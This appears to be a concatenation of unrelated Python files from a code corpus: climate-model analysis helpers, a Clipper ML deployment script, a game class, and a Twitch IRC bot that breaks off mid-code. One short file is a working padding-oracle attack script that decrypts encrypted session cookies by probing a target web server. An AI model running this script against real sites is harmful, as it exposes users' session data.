lowerDataBound = data2D[range(0,len(lowerIndex1D)),lowerIndex1D]\n lowerPressureBound[nanLowerIndex1D] = np.nan \n lowerDataBound[nanLowerIndex1D] = np.nan\n \n # Now: linearly interpolate the data in log pressure space \n # (interpolating in log pressure means interpolating linearly w.r.t. height)\n interpVec = lowerDataBound+(upperDataBound-lowerDataBound)*(np.log(pLevels[k])-np.log(lowerPressureBound))/(\n np.log(upperPressureBound)-np.log(lowerPressureBound)) \n \n # Finally: Reshape to 3D matrix to put in the later 4D matrix\n interpSlice = np.reshape(interpVec, (numTimes, numLons, numLats)) #time, lon, lat for consistency with above\n interpSlice = np.swapaxes(interpSlice,1,2) # switch lat and lon again\n interpMat[:,k,:,:] = interpSlice #Populate the returned matrix\n \n print('Finished k = ' + str(k))\n \n return interpMat\n \n# Function to obtain the low, middle and high cloud fraction from the \"cl\" output, based on output from above,\n# averaged over time. Assumes time subset has already been done.\n# Assumes random overlap (i.e. clouds in adjacent layers independent).\n# Do overlap calcualtion before time mean. \n# Returns 3 2D arrays for low, middle and high cloud fraction, in a dict with keys 'low', 'middle', 'high'.\n# Input: \"clPressure\": 4D array (time, pressure, lat, lon) of cloud fractions, e.g. obtained from above. \n# \"pLevels\": the pressure levels at which the cloud fractions are specified\n# \"divide100\": Whetehr to divide cloud fraction by 100 first. This is true by default, but 2 models\n# (BNU and CCSM4) didn't follow CMIP5 conventions and reported fraction instead of percent. \n# monthWeights: 12-member array of weights intended for use with \"np.ma.average\", associated with each month. \n# Intended for seasonal means, e.g. DJF: [1,1,0,0,0,0,0,0,0,0,0,1]. \n# Counted from first month in the \"clPressure\" array, so if first month is not January, need\n# to adjust input weights array. By default, not used and annual mean taken.\ndef calcLowMiddleHighClouds(clPressure, pLevels, divide100=True, monthWeights='none'):\n if divide100:\n clPressure = clPressure / 100.\n #Subset to low, middle and high \n clLow = clPressure[:, pLevels >= 680, :, :]\n clMiddle = clPressure[:, np.logical_and(pLevels < 680, pLevels >= 440), :, :]\n clHigh = clPressure[:, pLevels < 440, :, :]\n #Calculate cloud fractions in low, middle and high clouds using random overlap assumption. \n #The probability of clouds in any layer is one minus the probability of clouds in no layers. \n #The probability of clouds in no layer is the product of 1 - cloud fraction in each layer, if \n #the layers are independent.\n oneMinus_clLow = 1.0 - clLow\n oneMinus_clMiddle = 1.0 - clMiddle \n oneMinus_clHigh = 1.0 - clHigh\n #Set nans to 1.0 before taking product\n oneMinus_clLow[np.isnan(oneMinus_clLow)] = 1.0\n oneMinus_clMiddle[np.isnan(oneMinus_clMiddle)] = 1.0\n oneMinus_clHigh[np.isnan(oneMinus_clHigh)] = 1.0\n #Do the multiplication\n clRandomLow = 1 - np.prod(oneMinus_clLow, axis=1) #should now have dimensions time, lat, lon\n #print(np.shape(clRandomLow)) #debug\n clRandomMiddle = 1 - np.prod(oneMinus_clMiddle, axis=1)\n clRandomHigh = 1 - np.prod(oneMinus_clHigh, axis=1)\n #Create dict to return, and do time averaging\n returnDict = dict()\n if monthWeights == 'none': #annual mean\n returnDict['low'] = np.mean(clRandomLow, axis=0)\n returnDict['middle'] = np.mean(clRandomMiddle, axis=0)\n returnDict['high'] = np.mean(clRandomHigh, axis=0)\n else: #seasonal mean\n tiledWeights = np.tile(monthWeights,np.shape(clRandomLow)[0]/12)\n returnDict['low'] = np.average(clRandomLow, weights=tiledWeights, axis=0)\n returnDict['middle'] = np.average(clRandomMiddle, weights=tiledWeights, axis=0)\n returnDict['high'] = np.average(clRandomHigh, weights=tiledWeights, axis=0)\n return returnDict\n \n#Version of the above for models in height coordinates (i.e. HadGEM2-ES)\n#Boundaries: 3250, 6500 m, corresponding to 440 and 680 hPa using standard atmosphere.\ndef calcLowMiddleHighCloudsHeight(clHeight, zLevels, divide100=True, monthWeights='none'):\n if divide100: \n clHeight = clHeight / 100. \n #subset to low, middle and high\n clLow = clHeight[:, zLevels <= 3250, :, :]\n clMiddle = clHeight[:, np.logical_and(zLevels > 3250, zLevels <= 6500), :, :]\n clHigh = clHeight[:, zLevels > 6500, :, :]\n #Below this line, same as the pressure version\n oneMinus_clLow = 1.0 - clLow\n oneMinus_clMiddle = 1.0 - clMiddle \n oneMinus_clHigh = 1.0 - clHigh\n oneMinus_clLow[np.isnan(oneMinus_clLow)] = 1.0\n oneMinus_clMiddle[np.isnan(oneMinus_clMiddle)] = 1.0\n oneMinus_clHigh[np.isnan(oneMinus_clHigh)] = 1.0\n clRandomLow = 1 - np.prod(oneMinus_clLow, axis=1) \n clRandomMiddle = 1 - np.prod(oneMinus_clMiddle, axis=1)\n clRandomHigh = 1 - np.prod(oneMinus_clHigh, axis=1)\n returnDict = dict()\n if monthWeights == 'none': #annual mean\n returnDict['low'] = np.mean(clRandomLow, axis=0)\n returnDict['middle'] = np.mean(clRandomMiddle, axis=0)\n returnDict['high'] = np.mean(clRandomHigh, axis=0)\n else: #seasonal mean\n tiledWeights = np.tile(monthWeights,np.shape(clRandomLow)[0]/12)\n returnDict['low'] = np.average(clRandomLow, weights=tiledWeights, axis=0)\n returnDict['middle'] = np.average(clRandomMiddle, weights=tiledWeights, axis=0)\n returnDict['high'] = np.average(clRandomHigh, weights=tiledWeights, axis=0)\n return returnDict\n\n \n \n# Function to calculate Estimated Inversion Strength (Wood & Bretherton, 2006), \n# averaged over multiple years (but not doing any spatial averaging).\n# Results only valid over the ocean. \n#\n# Inputs:\n# Data: A dictionary of NetCDF Dataset objects containing the following variables, with keys as follows:\n# 'tas': Near-surface air temperature\n# 'ta': Air temperature at various heights\n# 'huss': Near-surface specific humidity \n# 'ps': Surface pressure\n# firstYear: First year of the multi-year averaging, measured from the start of the file starting at 0\n# lastYear: Last year of the multi-year averaging, measured from the start of the file starting at 0\n# index700: Index of the 700 hPa pressure level, starting from 0. For standard CMIP5 pressure levels in \n# order of decreasing pressure, this is 3. \n# monthWeights: see \"calcLowMiddleHighClouds\" documentation\n# \n# Returns: a 2D array (lat, lon dimensions)\ndef multiYearMeanEIS(Data, firstYear, lastYear, index700=3, monthWeights='none'):\n #Define physical constants \n Rd = 287. # J kg^-1 K^-1\n Rv = 461. # J kg^-1 K^-1\n Cp = 1004. # J kg^-1 K^-1\n Lv = 2.5e6 # J kg^-1\n g = 9.81 # m s^-2\n \n #Define the temperature, pressure and specific humidity variables \n #(Internal variable names holdovers from CESM analysis script)\n #Also do time subset now, so not doing calculations for entire dataset, only the years needed.\n T700 = Data['ta'].variables['ta'][firstYear*12:lastYear*12+12,index700,:,:] #Temperature at 700 hPa in K (time, lat, lon)\n T0 = Data['tas'].variables['tas'][firstYear*12:lastYear*12+12, :,:] #Surface air temperature in K\n PS = Data['ps'].variables['ps'][firstYear*12:lastYear*12+12, :,:]/100. #Divide by 100 to go from Pa (CMIP5 standard) to hPa\n QS = Data['huss'].variables['huss'][firstYear*12:lastYear*12+12, :,:] #Surface specific humidity, as a fraction (kg/kg)\n \n #Calculate the LTS (part of the EIS)\n Theta0 = T0*np.power((1000./PS),(Rd/Cp))\n Theta700 = T700*np.power((1000./700.),(Rd/Cp))\n LTS_3D = Theta700 - Theta0 #3D in the sense of time, lat, lon\n \n #Calculate the height of the Lifting Condensation Level (LCL)\n partialPressureWaterVapor = QS*(29./18.) \n e = partialPressureWaterVapor*PS #Vapor pressure in hPa\n Td = 243.5*np.log(e/6.112)/(17.67-np.log(e/6.112)) #Dew point, Bolton, 1980, eq. 11 (rearr. to more commonly used form)\n Td = Td + 273.15 #Td was in degrees C, needed to convert to K.\n LCL = (T0 - Td)/.008 #Lamb & Verlinde, 2011, eq. 6.16 (The denominator is in deg C / m)\n \n #Calculate the height of the 700 hPa surface\n z700 = (Rd*T0/g)*np.log(PS/700.) #Wood & Bretherton, 2006, eq. 6\n \n #Calculate the moist-adiabatic potential temperature gradient\n T850 = (T0 + T700)/2. #850 hPa temperature\n T850degC = T850 - 273.15 #Convert to degrees C for following equation\n es850 = 6.112*np.exp(17.67*T850degC/(T850degC+243.5)) #Saturation vapor pressure, Bolton, 1980, eq. 10\n Qsat850 = (es850/850.)*(18./29.) #Saturation specific humidity at 850 hPa\n Gamma_m850 = (g/Cp)*(1-(1+Lv*Qsat850/(Rd*T850))/(1+Lv*Lv*Qsat850/(Cp*Rv*T850*T850))) #Wood & Bretherton, 2006, eq. 5\n \n #Put it all together to get EIS\n EIS_3D = LTS_3D - Gamma_m850*(z700-LCL) #Wood & Bretehrton, 2006, eq. 4\n \n #Now take multi-year mean (have already subsetted in time, so do this over entire time axis)\n if monthWeights == 'none':\n multiYearMeanData = np.mean(EIS_3D, axis=0)\n else:\n tiledWeights = np.tile(monthWeights,np.shape(EIS_3D)[0]/12)\n multiYearMeanData = np.average(EIS_3D, weights=tiledWeights, axis=0)\n return multiYearMeanData \n \n\n# Similar function to \"multiYearMeanEIS\" but instead returns LTS, the lower tropospheric stability \n# (difference in potential temperature between 1000 and 700 hPa)\n# Same inputs as multiYearMeanEIS, except don't need the humidity stuff in the \"Data\" input dict.\n# monthWeights: see \"calcLowMiddleHighClouds\" documentation\ndef multiYearMeanLTS(Data, firstYear, lastYear, index700=3, monthWeights='none'):\n #Define physical constants \n Rd = 287. # J kg^-1 K^-1\n Cp = 1004. # J kg^-1 K^-1\n \n #Define the temperature, pressure and specific humidity variables \n #(Internal variable names holdovers from CESM analysis script)\n #Also do time subset now, so not doing calculations for entire dataset, only the years needed.\n T700 = Data['ta'].variables['ta'][firstYear*12:lastYear*12+12,index700,:,:] #Temperature at 700 hPa in K (time, lat, lon)\n T0 = Data['tas'].variables['tas'][firstYear*12:lastYear*12+12, :,:] #Surface air temperature in K\n PS = Data['ps'].variables['ps'][firstYear*12:lastYear*12+12, :,:]/100. #Divide by 100 to go from Pa (CMIP5 standard) to hPa\n \n #Calculate the LTS (part of the EIS)\n Theta0 = T0*np.power((1000./PS),(Rd/Cp))\n Theta700 = T700*np.power((1000./700.),(Rd/Cp))\n LTS_3D = Theta700 - Theta0 #3D in the sense of time, lat, lon\n \n #Now take multi-year mean (have already subsetted in time, so do this over entire time axis)\n if monthWeights == 'none':\n multiYearMeanData = np.mean(LTS_3D, axis=0)\n else:\n tiledWeights = np.tile(monthWeights,np.shape(LTS_3D)[0]/12)\n multiYearMeanData = np.average(LTS_3D, weights=tiledWeights, axis=0)\n return multiYearMeanData \n \n \n#Dictionary of colors for each model for plotting purposes\n#Note the 2-digit codes for the model which I will consistently use as dictionary keys. \nmodelColors = dict()\nmodelColors['bn'] = 'magenta' #BNU-ESM\nmodelColors['ca'] = 'indigo' #CanESM-2\nmodelColors['cc'] = 'cornflowerblue' #CCSM4\nmodelColors['ce'] = 'blue' #CESM-CAM5.1-FV\nmodelColors['cs'] = 'teal' #CSIRO\nmodelColors['ec'] = 'springgreen' #EC-EARTH-DMI\nmodelColors['gi'] = 'green' #GISS-E2-R\nmodelColors['hc'] = 'lime' #HadCM3\nmodelColors['hg'] = 'gold' #HadGEM2-ES\nmodelColors['ip'] = 'darkgoldenrod' #IPSL-CM5A-LR\nmodelColors['mi'] = 'orange' #MIROC-ESM\nmodelColors['mp'] = 'red' #MPI-ESM-LR\nmodelColors['no'] = 'maroon' #NorESM1\nmodelColors['mm'] = 'k' #Multi-Model Mean \n\n#On that note, need dictionary of names for the models, for plot legends. \nmodelNames = dict()\nmodelNames['bn'] = 'BNU-ESM'\nmodelNames['ca'] = 'CanESM-2'\nmodelNames['cc'] = 'CCSM4'\nmodelNames['ce'] = 'CESM-CAM5.1-FV'\nmodelNames['cs'] = 'CSIRO-Mk3L-1-2'\nmodelNames['ec'] = 'EC-EARTH-DMI'\nmodelNames['gi'] = 'GISS-E2-R'\nmodelNames['hc'] = 'HadCM3'\nmodelNames['hg'] = 'HadGEM2-ES'\nmodelNames['ip'] = 'IPSL-CM5A-LR'\nmodelNames['mi'] = 'MIROC-ESM'\nmodelNames['mp'] = 'MPI-ESM-LR'\nmodelNames['no'] = 'NorESM1-M'\nmodelNames['mm'] = 'Multi-Model Mean'\n\n\n\n#### Stuff for time series analysis ####\n\n\nclass MonthlyTimeSeries:\n\n def __init__(self, data, startMonth, startYear):\n self.data1D = data #raw data for plots of the full time series\n self.startMonth = startMonth\n self.startYear = startYear\n #Set up a 2D matrix with each column representing a month\n #while padding incomplete years at beginning and end with nans.\n if (len(data)+startMonth-1)%12 == 0:\n self.numYearsSpanned = (len(data)+startMonth-1)//12\n else:\n self.numYearsSpanned = (len(data)+startMonth-1)//12+1\n padBeginning = startMonth-1\n padEnd = 12-(len(data)+padBeginning)%12\n if padEnd == 12:\n padEnd = 0\n paddedData = np.pad(data, (padBeginning, padEnd), \n 'constant', constant_values = (np.nan,np.nan)) \n self.data2D = np.reshape(paddedData, (self.numYearsSpanned,12))\n self.years = np.arange(startYear, startYear+self.numYearsSpanned)\n\n #annual mean (incomplete years will be counted)\n def annualMean(self):\n return np.nanmean(self.data2D,axis=1)\n\n #mam (spring) mean\n def mamMean(self):\n return np.nanmean(self.data2D[:,2:5],axis=1)\n\n #jja (summer) mean\n def jjaMean(self):\n return np.nanmean(self.data2D[:,5:8],axis=1)\n\n #son (autumn) mean\n def sonMean(self):\n return np.nanmean(self.data2D[:,8:11],axis=1)\n\n #djf (winter) mean\n #How do I want to do this? Want to include December of previous year\n #reshape into vector, add 1 nan at beginning and delete the last one,\n #reshape back to matrix (now elements are shifted) and nanmean the 1st\n #3 columns. \n def djfMean(self):\n vect = np.reshape(self.data2D, (self.data2D.size,1)) \n vect=np.squeeze(vect)\n #vect = np.pad(vect, (1,0), 'constant', constant_values=(np.nan,np.nan))\n vect = np.concatenate((np.array([np.nan]),vect))\n vect = vect[0:len(vect)-1] #Delete last month so still divisible by 12\n mat = np.reshape(vect, (self.numYearsSpanned,12))\n return np.nanmean(mat[:,0:3],axis=1)\n\n\n# Function to calculate the global mean of a variable\n# from the GCM output. Now using the \n# latitudes taken from the netCDF file itself.\n# This version is for all times (returns an array with the \n# means for every month). \ndef globalMean(Data, varname): #\"data\" is netCDF4 data object\n latitudes = Data.variables['lat'][:]\n areaWeights = np.cos(latitudes*np.pi/180)\n datavar = np.squeeze(Data.variables[varname][:]) #Squeeze in case this is 1 slice from a height-varying array\n areaWeights3D = np.swapaxes(np.tile(areaWeights,\n (np.shape(datavar)[0],np.shape(datavar)[2],1)),\n 1,2) #Replicating the area weights \n weighted3DMatrix = datavar*areaWeights3D\n sumWeighted = np.sum(weighted3DMatrix,axis=(1,2))\n sumWeights3D = np.sum(areaWeights3D,axis=(1,2))\n weightedMean = sumWeighted/sumWeights3D\n return weightedMean\n\n\n\n\n#### Alternative versions of various functions which were used for testing ####\n\n#Northward energy flux functions in which time mean was done after integration \n#(didn't matter, and this version is slower so don't use)\ndef AtmosEnergyVerticalFluxConvergenceV2(DataDict, firstYear, lastYear):\n #Calculate the energy flux into the column\n fluxConv = ( DataDict['rsdt'].variables['rsdt'][firstYear*12:lastYear*12+12,:,:] \n - DataDict['rsut'].variables['rsut'][firstYear*12:lastYear*12+12,:,:]\n - DataDict['rlut'].variables['rlut'][firstYear*12:lastYear*12+12,:,:]\n - DataDict['rsds'].variables['rsds'][firstYear*12:lastYear*12+12,:,:]\n - DataDict['rlds'].variables['rlds'][firstYear*12:lastYear*12+12,:,:]\n + DataDict['rsus'].variables['rsus'][firstYear*12:lastYear*12+12,:,:]\n + DataDict['rlus'].variables['rlus'][firstYear*12:lastYear*12+12,:,:]\n + DataDict['hfls'].variables['hfls'][firstYear*12:lastYear*12+12,:,:]\n + DataDict['hfss'].variables['hfss'][firstYear*12:lastYear*12+12,:,:])\n return fluxConv\n\ndef AtmosEnergyTransportNorthwardV2(fluxConv, lat, lon, a):\n #First calculate grid cell area\n latDiff = lat[1]-lat[0]\n lonDiff = lon[1]-lon[0]\n gridCellAreas = a*a*(latDiff*np.pi/180.)*(lonDiff*np.pi/180.)*np.cos(lat*np.pi/180.) #Vector based on latitude\n \n #Now calculate total energy flux in grid boxes in Watts (not W/m^2)\n fluxWatts = fluxConv*gridCellAreas[None, :,None] #Dimensions of fluxConv are time, lat,lon;\n #\"None\" ensures weighting by lat, not lon, even if square grid.\n\n #Now integrate over longitudes\n fluxWattsZonalSum = np.sum(fluxWatts,axis=2) #Result: 2D array, dimensions: time, lat\n #Now cumuliatively integrate over latitudes\n energyTransportNorthward = np.cumsum(fluxWattsZonalSum, axis=1) #result: 2D array, dimensions: time, lat\n #Finally, take time mean\n energyTransportNorthwardMultiYearMean = np.mean(energyTransportNorthward,axis=0)\n return energyTransportNorthwardMultiYearMean\n","sub_path":"backup/geomipFunctions.py","file_name":"geomipFunctions.py","file_ext":"py","file_size_in_byte":70994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600387505","text":"from sklearn.ensemble import GradientBoostingClassifier\nimport numpy as np\nimport pandas as pd\nimport json\nimport requests\n\n# load data\nckd = pd.read_csv(\"data/kidney_disease.csv\")\n\n#make binary variable of outcome\nckd[\"classification\"] = np.where(ckd[\"classification\"] == \"ckd\" , 1, 0)\n\n#drop unnecessary columns\nckd.drop(['id','rbc','pc','pcc','pcv','wc','rc','ba','dm','cad','appet','pe',\n 'ane','sg','sc','pot','hemo','htn'],axis=1 ,inplace=True)\n\n#create train features and labels\nX = ckd.iloc[:300,]\nX = X.loc[:, X.columns != 'classification']\nX.fillna(0,inplace=True)\ny= ckd.iloc[:300,-1]\n\n# train a classifier\nmodel = GradientBoostingClassifier(random_state=2019)\nmodel.fit(X, y)\n\n# First we need to import Clipper\nfrom clipper_admin import ClipperConnection, KubernetesContainerManager\nfrom clipper_admin.deployers.python import deploy_python_closure\n\n# Create a Clipper connection\nclipper_conn = ClipperConnection(KubernetesContainerManager(useInternalIP=True,\n kubernetes_proxy_addr=\"127.0.0.1:8080\"))\n\n# Start a Clipper cluster or connect to a running one\nclipper_conn.start_clipper()\n\n# Register an app called 'kddtutorial'. This would create a REST endpoint\nclipper_conn.register_application(name=\"kddtutorial\", input_type=\"doubles\",\n default_output=\"-1.0\", slo_micros=10000000)\n\n# Access the trained model via closure capture\ndef predict(inputs):\n global model\n pred = model.predict(inputs)\n return [str(p) for p in pred]\n\n# Point to the gradient boosting model\nmodel = model\n\n# Deploy the 'predict' function as a model\ndeploy_python_closure(clipper_conn, name=\"gb-model\",\n version=1, input_type=\"doubles\", func=predict,\n pkgs_to_install=['scikit-learn','pandas','numpy','scipy'],\n registry= \"gkip\")\n\n# Routes requests for the application 'kddtutorial' to the model 'gb-model'\nclipper_conn.link_model_to_app(app_name=\"kddtutorial\", model_name=\"gb-model\")\n\ninputs = X.loc[200, X.columns != 'classification'] # use random data point\nheaders = {\"Content-type\": \"application/json\"}\naddr = clipper_conn.get_query_addr()\nresponse =requests.post(\"http://%s/%s/predict\" % (addr, 'kddtutorial'), headers=headers,\n data=json.dumps({\"input\": list(inputs)})).json()\nprint(response)\n\nclipper_conn.stop_all()\n","sub_path":"clipper/clipper_kubernetes.py","file_name":"clipper_kubernetes.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508592447","text":"\"\"\"\nThis script can be used to decrypt a cookie. It should be called with:\n python3 decrypt.py $HEX_ENCODED_COOKIE\n\"\"\"\nfrom paddingoracle import BadPaddingException, PaddingOracle\nimport requests\nfrom sys import argv\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass PadBuster(PaddingOracle):\n def __init__(self, target_url, **kwargs):\n super(PadBuster, self).__init__(**kwargs)\n self.target_url = target_url\n\n def oracle(self, data, **kwargs):\n cookies = {\n 'user_object': data.hex(),\n }\n\n response = requests.get(self.target_url, cookies=cookies)\n if not response.ok:\n raise BadPaddingException\n\n\nif __name__ == '__main__':\n target_url = argv[1]\n encrypted_cookie = bytes.fromhex(argv[2])\n\n padbuster = PadBuster(target_url)\n cookie = padbuster.decrypt(encrypted_cookie, block_size=16)\n\n print('Decrypted cookie: %s => %s' % (argv[1], cookie))","sub_path":"example_decrypt_http.py","file_name":"example_decrypt_http.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"72371987","text":"# engine/gameblueprint.py\n# Lillian Lynn Lemmer \n#\n# This module is part of Untitled Game Engine and is released under the\n# MIT License: http://opensource.org/licenses/MIT\n\n\"\"\"Logic flow for the game.\n\nNote:\n I have not decided firmly on the approach to take. Expect heavy\n changes in the future.\n\n Sorry for the poor documentation, I have not devised an actual\n architecture for this particular module. I have not decided\n firmly on the approach to take. Here, I'm sort of imitating\n Flask's app.\n\n\"\"\"\n\n__author__ = \"Lillian Lemmer\"\n__copyright__ = \"Copyright 2015, Lillian Lemmer\"\n__credits__ = [\"Lillian Lemmer\"]\n__license__ = \"MIT\"\n__maintainer__ = \"Lillian Lemmer\"\n__email__ = \"lillian.lynn.lemmer@gmail.com\"\n__status__ = \"Development\"\n\n\nclass GameBlueprint(object):\n\n def __init__(self, screen, tilemap, viewport, human_player, items=None):\n self.human_player = human_player\n self.tilemap = tilemap\n self.viewport = viewport\n self.items = items or []\n self.screen = screen\n\n def init(self):\n self.tilemap.convert_layer_images()\n self.human_player.init()\n\n def item_check(self):\n ungot_items = []\n\n for item in self.items:\n\n if item.rect.colliderect(self.human_player.rect):\n # should this be player.pickup item? or both?\n item.pickup(self.human_player)\n else:\n ungot_items.append(item)\n\n self.items = ungot_items\n\n def blit_all(self):\n self.viewport.pan_for_entity(self.human_player)\n self.viewport.blit(self.tilemap.layer_images[0])\n\n for item in self.items:\n item.blit(self.viewport.surface,\n (self.viewport.start_x, self.viewport.start_y))\n\n self.human_player.blit(\n self.viewport.surface,\n (\n self.viewport.start_x,\n self.viewport.start_y\n )\n )\n\n for layer in self.tilemap.layer_images[1:]:\n self.viewport.blit(layer)\n\n","sub_path":"engine/gameblueprint.py","file_name":"gameblueprint.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64823410","text":"#!/usr/bin/env python3\n\nimport os\nimport re\nimport sys\nimport irc.bot\nimport socket\nimport traceback\nimport signal\nfrom irc.client import ServerNotConnectedError\nfrom time import gmtime\nfrom calendar import timegm\nfrom collections import defaultdict, OrderedDict\nfrom unicodedata import normalize as unicode_normalize\n\nWORDS = re.compile(r\"(?:-\\w|\\w)[-\\w]*\")\nTIME = re.compile(r\"\\s*(\\d+)\\s*([a-z]+)?\\s*\")\n\nEXIT_EXCS = SystemExit, KeyboardInterrupt\nROW_TYPES = tuple, list\n\ndef normalize(word):\n\treturn unicode_normalize('NFC', word).lower()\n\ndef normalize_channel(channel):\n\tchannel = channel.lower()\n\tif not channel.startswith('#'):\n\t\tchannel = '#'+channel\n\treturn channel\n\ndef parse_int_bound(value):\n\tvalue = value.lower()\n\tif value == 'none' or value == 'null' or value == 'unbounded' or value == 'unlimited':\n\t\treturn None\n\telse:\n\t\treturn int(value, 10)\n\ndef parse_time(time):\n\tif not time:\n\t\traise ValueError(time)\n\n\tindex = 0\n\tseconds = 0\n\twhile index < len(time):\n\t\tmatch = TIME.match(time, index)\n\t\tif not match:\n\t\t\traise ValueError(time)\n\n\t\tvalue = int(match.group(1), 10)\n\t\tunit = match.group(2)\n\n\t\tif unit:\n\t\t\tunit = unit.lower()\n\t\telse:\n\t\t\tunit = 'seconds'\n\n\t\tif unit == 's' or unit == 'sec' or unit == 'secs' or unit == 'seconds' or unit == 'second':\n\t\t\tseconds += value\n\n\t\telif unit == 'm' or unit == 'min' or unit == 'mins' or unit == 'minutes' or unit == 'minute':\n\t\t\tseconds += value * 60\n\n\t\telif unit == 'h' or unit == 'hours' or unit == 'hour':\n\t\t\tseconds += value * 3600\n\n\t\telse:\n\t\t\traise ValueError(time)\n\n\t\tindex = match.end()\n\n\treturn seconds\n\ndef format_time(seconds):\n\tif seconds == 0:\n\t\treturn '0sec'\n\n\tnegative = seconds < 0\n\tif negative:\n\t\tseconds = -seconds\n\tminutes = seconds // 60\n\tseconds -= minutes * 60\n\thours = minutes // 60\n\tminutes -= hours * 60\n\n\tbuf = []\n\tif hours:\n\t\tbuf.append('%dh' % hours)\n\n\tif minutes:\n\t\tbuf.append('%dmin' % minutes)\n\n\tif seconds:\n\t\tbuf.append('%dsec' % seconds)\n\n\ttime = ' '.join(buf)\n\n\tif negative:\n\t\ttime = '-'+time\n\n\treturn time\n\nclass ChannelData:\n\t__slots__ = 'period', 'counts', 'minint', 'maxint', 'result_limit'\n\n\tdef __init__(self, period, minint=None, maxint=None, result_limit=None, counts=None):\n\t\tself.period = period\n\t\tself.counts = counts if counts is not None else []\n\t\tself.minint = minint\n\t\tself.maxint = maxint\n\t\tself.result_limit = result_limit\n\t\t# maybe more in the future\n\n\tdef dump(self):\n\t\treturn {\n\t\t\t'period': self.period,\n\t\t\t'counts': [list(row) for row in self.counts],\n\t\t\t'minint': self.minint,\n\t\t\t'maxint': self.maxint,\n\t\t\t'result_limit': self.result_limit\n\t\t}\n\n\tdef find_first_non_gc_count(self, periodts):\n\t\tfor index, (user, word, timestamp) in enumerate(self.counts):\n\t\t\tif timestamp >= periodts:\n\t\t\t\treturn index\n\t\treturn len(self.counts)\n\nclass CounterBot(irc.bot.SingleServerIRCBot):\n\t__slots__ = ('home_channel', 'period', 'gcinterval', 'admins', 'ignored_users',\n\t 'channel_data', 'join_channels', 'max_message_length',\n\t 'default_minint', 'default_maxint', 'default_result_limit')\n\n\tdef __init__(self, home_channel, default_period, gcinterval, max_message_length,\n\t\t default_minint, default_maxint, default_result_limit, admins,\n\t\t ignored_users, nickname, channels, password=None,\n\t\t server='irc.twitch.tv', port=6667):\n\t\tirc.bot.SingleServerIRCBot.__init__(self, [(server, port, password)], nickname, nickname)\n\t\tself.home_channel = normalize_channel(home_channel) if home_channel else None\n\t\tself.default_period = default_period\n\t\tself.gcinterval = gcinterval\n\t\tself.max_message_length = max_message_length\n\t\tself.default_minint = default_minint\n\t\tself.default_maxint = default_maxint\n\t\tself.default_result_limit = default_result_limit\n\t\tself.admins = set(admin.lower() for admin in admins)\n\t\tself.ignored_users = set(user.lower() for user in ignored_users)\n\t\tself.channel_data = defaultdict(self.make_channel_data)\n\t\tself.joined_channels = set()\n\t\tself.set_join_channels(channels)\n\t\tself.gc_scheduled = False\n\t\tself.schedule_gc_if_needed()\n\n\tdef make_channel_data(self):\n\t\treturn ChannelData(self.default_period, self.default_minint, self.default_maxint, self.default_result_limit)\n\n\tdef schedule_gc_if_needed(self):\n\t\tif not self.gc_scheduled:\n\t\t\tneeded = False\n\t\t\tfor data in self.channel_data.values():\n\t\t\t\tif data.counts:\n\t\t\t\t\tneeded = True\n\t\t\t\t\tbreak\n\t\t\tself.schedule_gc()\n\n\tdef schedule_gc(self):\n\t\tself.connection.execute_delayed(self.gcinterval, self.run_gc)\n\t\tself.gc_scheduled = True\n\n\tdef set_join_channels(self, channels):\n\t\tchannels = OrderedDict((normalize_channel(channel), True) for channel in channels)\n\t\tif self.home_channel in channels:\n\t\t\tdel channels[self.home_channel]\n\t\tself.join_channels = list(channels)\n\n\tdef run_gc(self):\n\t\tself.gc_scheduled = False\n\t\ttimestamp = timegm(gmtime())\n\t\tdelchannels = []\n\t\tfor channel in self.channel_data:\n\t\t\tif channel not in self.joined_channels:\n\t\t\t\tdelchannels.append(channel)\n\n\t\trowcount = 0\n\t\tfor channel in delchannels:\n\t\t\trowcount += len(self.channel_data[channel].counts)\n\t\t\tdel self.channel_data[channel]\n\n\t\tneeded = False\n\t\tfor data in self.channel_data.values():\n\t\t\tperiodts = timestamp - data.period\n\t\t\tindex = data.find_first_non_gc_count(periodts)\n\n\t\t\tif index > 0:\n\t\t\t\tdel data.counts[:index]\n\t\t\t\trowcount += index\n\n\t\t\tif data.counts:\n\t\t\t\tneeded = True\n\n\t\tprint('gc: Deleted %d rows.' % rowcount if rowcount != 1 else 'gc: Deleted 1 row.')\n\n\t\tif needed:\n\t\t\tself.schedule_gc()\n\n\tdef on_welcome(self, connection, event):\n\t\tif self.home_channel is not None:\n\t\t\tself.do_join(self.home_channel)\n\n\t\tfor channel in self.join_channels:\n\t\t\tself.do_join(channel)\n\n\t\tconnection.cap('REQ', 'twitch.tv/membership')\n\n\t\tif self.home_channel is not None:\n\t\t\tself.chunked_privmsg(self.home_channel, \"%s booted!\" % self.connection.get_nickname())\n\n\tdef do_join(self, channel):\n\t\tself.connection.join(channel)\n\t\tself.joined_channels.add(channel)\n\t\tself.chunked_privmsg(self.home_channel or channel, \"Joined to %s.\" % channel)\n\n\tdef do_part(self, channel):\n\t\tself.connection.part(channel)\n\n\t\t# delete data immediately, don't trust what the IRC server says\n\t\tif channel in self.channel_data:\n\t\t\tdel self.channel_data[channel]\n\n\t\tif channel in self.joined_channels:\n\t\t\tself.joined_channels.remove(channel)\n\n\t\tif self.home_channel is not None:\n\t\t\tself.chunked_privmsg(self.home_channel, \"Parted from %s.\" % channel)\n\n\tdef on_nicknameinuse(self, connection, event):\n\t\tprint('Error: nickname in use', file=sys.stderr)\n\n\tdef on_error(self, connection, event):\n\t\tprint('Error: '+' '.join(event.arguments), file=sys.stderr)\n\n\tdef on_pubmsg(self, connection, event):\n\t\tsender = event.source.nick\n\n\t\tif sender in self.ignored_users:\n\t\t\treturn\n\n\t\tchannel = event.target\n\t\tmessage = event.arguments[0]\n\n\t\tif message.startswith(\"!\"):\n\t\t\tcommand, *args = message.rstrip().split()\n\t\t\tcommand = command[1:]\n\t\t\tif channel == self.home_channel:\n\t\t\t\tmethod = 'home_cmd_'+command\n\t\t\t\tif not hasattr(self, method):\n\t\t\t\t\tmethod = 